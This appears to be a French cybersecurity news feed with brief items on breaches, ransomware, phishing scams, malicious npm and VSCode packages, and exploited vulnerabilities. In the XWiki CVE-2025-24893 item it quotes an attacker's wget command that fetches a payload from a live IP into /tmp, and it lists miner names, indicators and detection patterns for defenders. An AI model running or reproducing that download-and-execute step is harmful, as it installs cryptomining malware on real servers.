• Basé sur Firefox ESR 140, Tor Browser 15.0 est disponible sur desktop et Android.
• Le navigateur libre y améliore notamment ses onglets et sa sécurité.

Ce nouvel agent de cybersécurité est capable d'identifier, d'expliquer et de contribuer à corriger les vulnérabilités.

• OpenAI a lancé Aardvark, un agent de recherche en cybersécurité.
• Aardvark, basé sur GPT-5, est actuellement en version bêta privée.
• Il peut découvrir et contribuer à corriger les failles de sécurité.

Souvenez-vous, il y a un peu plus d’un an, Free a subi une cyberattaque ravageuse qui a permis de dérober certaines informations de ses clients et notamment leurs IBAN. Ces précieuses données personnelles sont aujourd’hui utilisées par des acteurs malveillants qui ont lancé une campagne de phishing.

Quatre pays européens, la France, l'Allemagne, l'Italie et les Pays-Bas, ont annoncé mercredi la création d'un consortium qui aura pour but de développer des infrastructures numériques souveraines dans la cybersécurité, l'IA et le cloud.

Dans les dernières semaines, le Centre pour la cybersécurité et la Gendarmerie royale du Canada ont reçu plusieurs signalements d'incidents liés à des systèmes de contrôle industriels (SCI) accessibles depuis Internet. L'un des incidents touchait une installation de traitement de l'eau. Des valeurs de pression d'eau ont été trafiquées, ce qui a entraîné une dégradation du service dans le secteur desservi par cette installation. Un autre incident s'est produit dans une entreprise pétrolière et gazière canadienne. Une jauge magnétique à lecture directe a été manipulée, ce qui a déclenché de fausses alarmes. Dans le cadre d'un troisième incident, qui a touché une ferme canadienne, les niveaux de température et d'humidité d'un silo de séchage du grain ont été manipulés, ce qui aurait pu entraîner des conditions dangereuses s'ils n'avaient pas été découverts à temps.

Dans un rapport publié le 27 octobre 2025, la société de cybersécurité Kaspersky revient sur une vaste campagne de cyberespionnage ayant pris pour cible le navigateur Google Chrome. Les pirates sont parvenus à contourner la sandbox du navigateur afin d’infecter de nombreuses victimes. Nous sommes en mars 2025 et les chercheurs de la société de cybersécurité Kaspersky détectent une vague d’infections touchant des organisations gouvernementales et financières russes.

L’attaque est particulièrement efficace. Nul besoin de télécharger une pièce jointe ou de procéder à une manipulation complexe, il suffit que la victime clique sur un lien issu d’un message de phishing pour être infectée.

• La Corée du Nord a volé 2,84 milliards de dollars en cryptomonnaies depuis janvier 2024, dont 1,65 milliard rien qu’entre janvier et septembre 2025.
• Pyongyang déploie entre 1 000 et 1 500 travailleurs informatiques en Chine et prévoit d’en envoyer jusqu’à 40 000 en Russie.
• Les autorités américaines ont sanctionné en août un réseau de travailleurs informatiques nord-coréens, marquant un tournant dans la lutte contre cette menace.
• Des dizaines de millions de dollars du piratage de Bybit ont été récupérés, démontrant l’efficacité croissante des outils de traçage.

Un piratage a visé une société de sécurité maritime. Parmi les données exposées: des rapports confidentiels d’incidents survenus lors de voyages.

• Des pirates informatiques ont dévoilé des rapports d’incidents sensibles de MSC Croisières.
• Un document révèle l’agression présumée d’une passagère suisse de 11 ans.
• Les crimes en mer échappent souvent à toute juridiction claire.

Dans une étude publiée le 28 octobre 2025, les chercheurs de la société de cybersécurité Socket alertent sur la présence de 10 paquets malveillants cachés dans la bibliothèque en ligne npm. La plateforme est utilisée par des millions de développeurs à travers le monde pour bâtir des logiciels informatiques.

Un chercheur en sécurité, Jose Pino, a trouvé un important problème dans Chrome, qui peut rejaillir dans tous les navigateurs basés sur Chromium. Il ne peut pas en l’état être utilisé pour pirater une machine, mais il peut occasionner un plantage complet du navigateur, voire de la machine selon la configuration utilisée.

Nouvelle attaque France Travail via infostealers, vulnérabilité critique WSUS exploitée massivement, retour du spyware Dante (ex-Hacking Team), failles des navigateurs IA, cyberattaque JLR record à 2,5 milliards $, vol de secrets 0day L3Harris vendus à la Russie, 1M$ de récompenses au Pwn2Own et l'exploit WhatsApp non divulgué, etc.

HelixGuard Team publie une analyse mettant en lumière une campagne d’abus de l’écosystème d’extensions VSCode (Microsoft Marketplace et OpenVSX), identifiant 12 composants malveillants — dont 4 toujours non retirés — et détaillant leurs comportements, canaux d’exfiltration et adresses C2.

Extensions et statuts:

Non retirées: Christine-devops1234.scraper (1.0.3–1.0.7), Kodease.fyp-23-s2-08 (0.10.0), GuyNachshon.cxcx123 (0.0.1), sahil92552.CBE-456 (0.0.2–0.0.6)

Retirées: teste123444212.teste123444212, Solorzano-JuanJose.fake-extension-test, ToToRoManComp.diff-tool-vsc, Deriv-AI.deriv-ai, EMM.emmpilot, CodeRanger.ncsu-csc111, BX-Dev.Blackstone-DLP, VKTeam.ru

Source: Wordfence (blog). Wordfence décrit une vulnérabilité de lecture arbitraire de fichiers dans le plugin WordPress Anti‑Malware Security and Brute‑Force Firewall (100 000+ installations), exploitable par des comptes authentifiés au niveau abonné et corrigée en version 4.23.83.(publiée le 15/10/2025).

👇

https://wordpress.org/plugins/gotmls/#developers

Microsoft Azure, deuxième plateforme cloud (informatique à distance) au monde, connaît des perturbations depuis 17 heures, heure de Paris, rapporte mercredi 29 octobre son site de maintenance, affectant, entre autres, des jeux en ligne ou des services de compagnies aériennes et ferroviaires.

...

Il survient une semaine après une panne mondiale de plus grande ampleur qui a touché son concurrent AWS, la filiale d’Amazon qui domine le marché du cloud, devenu l’épine dorsale des services informatiques en ligne sur laquelle repose une large part de l’économie mondiale.

France Travail a été victime d'une cyberattaque lundi, a appris mercredi 29 octobre franceinfo auprès de l'établissement public. "Selon nos premières investigations, des données ont en effet été extraites", explique France Travail, sans être "en mesure de confirmer le volume des demandeurs d’emploi concernés, ni de confirmer la nature des données" piratées.

Actualités de la cybersécurité francophone🇨🇭​ CyberVeille piloté par @decio #switzerland #france #canada #threats #informatique

👥​ Suivre le groupe @cyberveille

:rss:​ https://infosec.pub/feeds/c/cyberveille.xml?sort=Active

🌐​ https://cyberveille.ch/

⚠️ Vulnérabilité XWiki CVE-2025-24893 activement exploitée

Une faille critique dans XWiki (CVE-2025-24893) est exploitée activement sur internet. Elle permet une injection de template non authentifiée pouvant conduire à l’exécution de code à distance (RCE). Des attaquants s’en servent actuellement pour installer un mineur de cryptomonnaie.

🧩 Ce qui se passe

Selon VulnCheck , leurs “canaries” ont observé une chaîne d’exploitation en deux étapes :

Première étape : L’attaquant dépose un petit script (x640) dans /tmp/. Exemple :

wget http://193.32.208.24:8080/7I2l42wlAe/x640 -O /tmp/11909

Deuxième étape (20 min plus tard) : Il exécute ce script, qui télécharge et lance deux autres (x521 et x522). Ceux-ci installent puis démarrent un mineur de cryptomonnaie appelé tcrond, configuré pour se connecter à c3pool.org.

Le malware nettoie ensuite la machine (historique, processus concurrents, etc.) pour monopoliser les ressources CPU.

🚨 Détails techniques & indicateurs (IOCs)

IPs observées :

• 123.25.249.88 (Vietnam)

• 193.32.208.24 (héberge les payloads)

Fichiers et scripts malveillants :

• /tmp/11909

• x640, x521, x522

• binaire : tcrond (mineur UPX-packed)

Hashes connus :

tcrond (UPX): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10 tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f x640: 5abc337dbc04fee7206956dad1e0b6d43921a868

🔍 Vérifications rapides

Sur un serveur XWiki, exécutez :

find /tmp /var/tmp -type f -mtime -2 -ls
ps aux | egrep 'tcrond|xmrig|kinsing|kdevtmpfsi|nanopool'
ss -tunp | egrep '193\.32\.208\.24|123\.25\.249\.88'

⚙️ Si vous trouvez /tmp/11909 ou un binaire tcrond, la machine est probablement compromise. Isolez-la, collectez les journaux, puis réinstallez à partir d’une source propre.

🛡️ Mesures recommandées

Mettre à jour XWiki dès qu’un correctif officiel est disponible.

Restreindre l’accès à /bin/get/Main/SolrSearch via un proxy ou un WAF.

Bloquer les IPs observées (pare-feu, IDS).

Surveiller les logs pour des requêtes contenant {{groovy}} ou wget ... /tmp/.

Sources:

👇

XWiki CVE-2025-24893 Exploited in the Wild

👇

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j

Les chercheurs de Kaspersky ont détecté en début d'année une campagne de cyberespionnage contre des organisations russes, basée sur l'exploitation d'une vulnérabilité 0-day dans Google Chrome. Après avoir remonté la chaîne d'attaque, ils ont relié le malware utilisé au logiciel espion “Dante”, développé et commercialisé par la société italienne Memento Labs (ex-HackingTeam).

Pour échapper à la détection des outils de sécurité, le gang de ransomware Qilin a été observé en train d'utiliser une nouvelle technique : l'utilisation de Windows Subsystem for Linux (WSL) pour exécuter son module de chiffrement des données créé pour Linux.

Le ransomware Qilin, apparu pour la première fois en août 2022 et initialement nommé Agenda, est actuellement l’une des menaces les plus redoutables. D’après les recherches de Trend Micro et Cisco Talos, ce gang de ransomware Qilin serait à l'origine de plus de 700 victimes réparties dans 62 pays au cours de l’année 2025. Depuis cet été, on parle d'une moyenne de 40 nouvelles victimes publiées chaque mois.

Watch on Video channel logo Les affiliés de Qilin ont d'ailleurs pour habitude de détourner l'utilisation d'outils légitimes pour s'introduire dans les réseaux des entreprises. On peut notamment donner les exemples suivants :

• Outils de prise de contrôle à distance comme AnyDesk, ScreenConnect, Splashtop.
• Applications utilisées pour l’exfiltration de données : Cyberduck, WinRAR.
• Des utilitaires intégrés à Windows comme Paint ou Bloc-notes pour visualiser les documents avant de les exfiltrer.

• Microsoft prêche contre BinaryFormatter depuis 5 ans mais l'utilise en secret dans WSUS : 500 000 serveurs exposés à une faille critique exploitée massivement
• Un attaquant non authentifié peut prendre le contrôle total d'un serveur Windows avec privilèges SYSTEM en envoyant simplement un cookie malveillant
• Microsoft déprécie discrètement WSUS un an avant que la faille n'éclate : coïncidence ou savaient-ils que leur code zombie allait exploser ?

Des escrocs publient de fausses annonces de location d'appartements ou de maisons, qui ne sont en réalité pas à louer. Lorsqu’une personne est intéressée, le prétendu propriétaire explique qu’il se trouve à l’étranger, rendant impossible toute visite du bien. Il est alors demandé à la victime de verser un acompte ou une caution via la plateforme Airbnb, «par mesure de sécurité». Un lien est ensuite envoyé, dirigeant vers un site qui ressemble comme deux gouttes d'eau à celui d'Airbnb. Il s’agit en réalité d’un faux site et d'une tentative de phishing. Une fausse facture est ensuite générée, demandant un paiement sur un compte privé à l’étranger.

Votre entreprise stocke ses données chez Amazon Web Services. Vos employés utilisent Microsoft 365. Vos développeurs codent avec des outils américains. Vos serveurs tournent sur des processeurs taïwanais. Vos services d’intelligence artificielle s’appuient sur ChatGPT ou Claude.

Posez-vous cette question : que se passerait-il si ces technologies devenaient inaccessibles demain ?

Alors que l’Europe accélère sa transition énergétique, un nouveau risque de dépendance apparaît. La majorité des équipements solaires installés sur le continent, notamment les onduleurs, provient de Chine. Une situation qui soulève des inquiétudes croissantes en matière de souveraineté industrielle et de cybersécurité.

Après le gaz russe, l'Europe risque-t-elle d'être de nouveau trop dépendante d'une puissance étrangère pour ses besoins énergétiques ? Selon le média Politico, la réponse est oui. Mais il ne s'agit pas de gaz, ni de carburant. Le problème se trouve directement au niveau de la production d'électricité, et plus spécifiquement le solaire.

Dans un rapport publié le 23 octobre 2025, la société de services réseaux Infoblox met en lumière la face cachée du navigateur Universe Browser. L’outil, téléchargé des millions de fois, promettait à ses utilisateurs un respect de leur vie privée et la possibilité de contourner la censure dans les pays où les jeux d’argent en ligne sont interdits. Entre escroqueries à échelle industrielle, opérations de fraude générant des dizaines de milliards de dollars par an et trafics d’êtres humains, les réseaux cybercriminels d’Asie du Sud-Est ne cessent d’inquiéter les autorités internationales.

Le 29 octobre 2025, Peter Williams, ancien directeur général de la société de cybersécurité Trenchant, devra répondre aux accusations de la justice fédérale américaine. Ce ressortissant australien est officiellement inculpé pour avoir volé et vendu plusieurs secrets industriels appartenant à ses clients à un acheteur russe, en échange d’environ 1,3 million de dollars. Quels secrets ont été vendus et qui a pu mettre la main dessus ? Voilà deux des nombreux points d’interrogation qui entourent l’affaire Peter Williams aux États-Unis.